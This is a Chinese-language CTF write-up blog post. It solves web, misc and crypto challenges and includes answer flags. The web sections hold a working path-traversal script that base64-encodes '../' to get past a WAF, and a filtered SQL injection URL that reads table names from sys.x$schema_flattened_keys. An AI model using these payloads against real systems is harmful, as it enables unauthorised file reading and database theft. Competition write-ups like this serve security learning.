啊这, 这波是预判失误,以为时间短能来点阳间题,结果比六月海阴间,qswl
web1:
这题差点出,卡在waf过滤的../ 彳亍口巴,反正就是很简单的一道题(老诸葛亮了)
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
import requests as req
import base64 as b
import time as t
from urllib.parse import quote_plus as urlen
HOST = "http://183.129.189.60:10009/image.php?t={}&f=".format(int(t.time()))
file = 'y1ng/../../../../../../../flag'
file = b.b64encode(file.encode("utf-8")).decode("utf-8")
url = HOST+urlen(file)
print(req.get(url).text)
web2:
正则过滤,过滤一堆堆
以为联合注入,结果是个布尔盲注,然而好像联合也能出,结束后构筑出来了,没提交上.jpg
http://183.129.189.60:10004/?id=1%27/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/table_name/**/limit/**/0,1%23
misc1:
挺阴间的一道题.jpg要不是被提示是ntfs隐写,我可能都把压缩包吃了
开局一个压缩包一个red_blue.png图片
red_bule 脑测是lsb隐写,
然后可以提取出图片一张
输入后解压flag.zip 出现如下两个文件
卡这卡半天,winhex看hint.png最后一行base64加密 以此解密后得到提示:
?jpg跟base85有啥关系、、?
请教了一下神大人,是ntfs隐写,啊这,
直接提出来
base85解密即可
WEB2:
一个gif,总共64张二维码碎片,
由于是纯体力活,这题我就懒得做了
直接贴一下神大人的一把梭脚本,
from PIL import Image
from Crypto.Util import number
import base64
dic = {0:'0',1:'1',2:'2',3:'3',4:'4',5:'5',6:'6',7:'7',8:'8',9:'9',10:'A',11:'B',12:'C',13:'D',14:'E',15:'F',38:'%'}
res = ''
for num in range(64):
p = Image.open('frame'+str(num+1)+'.bmp')
a,b = p.size
# print(a)
data = []
for y in range(100,b-10,10):
d = []
for x in range(410,470,10):
if (y//10)%2 == 0:
if p.getpixel((x,y)) >= 200:
d.append('1')
else:
d.append('0')
else:
if p.getpixel((x,y)) >= 200:
d.append('0')
else:
d.append('1')
data.append(d)
mode = data[11][5]+data[11][4]+data[10][5]+data[10][4]
# print(mode)
length = data[9][5]+data[9][4]+data[8][5]+data[8][4]+data[7][5]+data[7][4]+data[6][5]+data[6][4]+data[5][5]
# print(length)
d1 = data[5][4]+data[4][5]+data[4][4]+data[3][5]+data[3][4]+data[2][5]+data[2][4]
d2 = data[1][5]+data[1][4]+data[0][5]+data[0][4]+data[0][3]+data[0][2]+data[1][3]+data[1][2]
d3 = data[2][3]+data[2][2]+data[3][3]+data[3][2]+data[4][3]+data[4][2]+data[5][3]+data[5][2]
d4 = data[6][3]+data[6][2]+data[7][3]+data[7][2]+data[8][3]+data[8][2]+data[9][3]+data[9][2]
d5 = data[10][3]+data[10][2]+data[11][3]+data[11][2]+data[11][1]+data[11][0]+data[10][1]+data[10][0]
d6 = data[9][1]+data[9][0]+data[8][1]+data[8][0]+data[7][1]+data[7][0]+data[6][1]+data[6][0]+data[5][1]
d = d1+d2+d3+d4+d5+d6
fin = d[:33]
for i in range(0,len(fin),11):
y = int(fin[i:i+11],2)%45
x = int(fin[i:i+11],2)//45
res += dic[x] + dic[y]
b64_data = number.long_to_bytes(int(res.replace('%',''),16))
while 1:
b64_data = base64.b64decode(b64_data)
if b'flag' in b64_data:
print(b64_data)
break
密码1:
源代码:
from flag import flag
def pairing(a,b):
shell = max(a, b)
step = min(a, b)
if step == b:
flag = 0
else:
flag = 1
return shell ** 2 + step * 2 + flag
def encrypt(message):
res = ''
for i in range(0,len(message),2):
res += str(pairing(message[i],message[i+1]))
return res
print(encrypt(flag))
# 1186910804152291019933541010532411051999082499105051010395199519323297119520312715722
由于过于简单直接贴脚本了,告辞。
flag = '1186910804152291019933541010532411051999082499105051010395199519323297119520312715722'
flag = '1186910804152291019933541010532411051999082499105051010395199519323297119520312715722'
_flag = ''
i = 0
while i <= len(flag):
a = flag[i:i+5]
# print('try 4')
a = int(a)
ok = False
for j in range(33, 127):
for k in range(33, 127):
if j >= k and j ** 2 + k * 2 == a:
_flag += chr(j) + chr(k)
ok = True
i += 5
print(_flag)
print(a)
break
elif j < k and k ** 2 + j * 2 + 1 == a:
_flag += chr(j) + chr(k)
ok = True
i += 5
print(_flag)
print(a)
break
if ok:
break
if ok != True:
# print('try 5')
a = flag[i:i + 4]
a = int(a)
ok = False
for j in range(33, 127):
for k in range(33, 127):
if j >= k and j ** 2 + k * 2 == a:
_flag += chr(j) + chr(k)
ok = True
i += 4
print(_flag)
print(a)
break
elif j < k and k ** 2 + j * 2 + 1 == a:
_flag += chr(j) + chr(k)
ok = True
i += 4
print(_flag)
print(a)
break
if ok != True:
print('not ok')
print(a)
exit(0)
# flag{2cd944d849fc5112f3d7a7a08b5a7370}
print(_flag)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容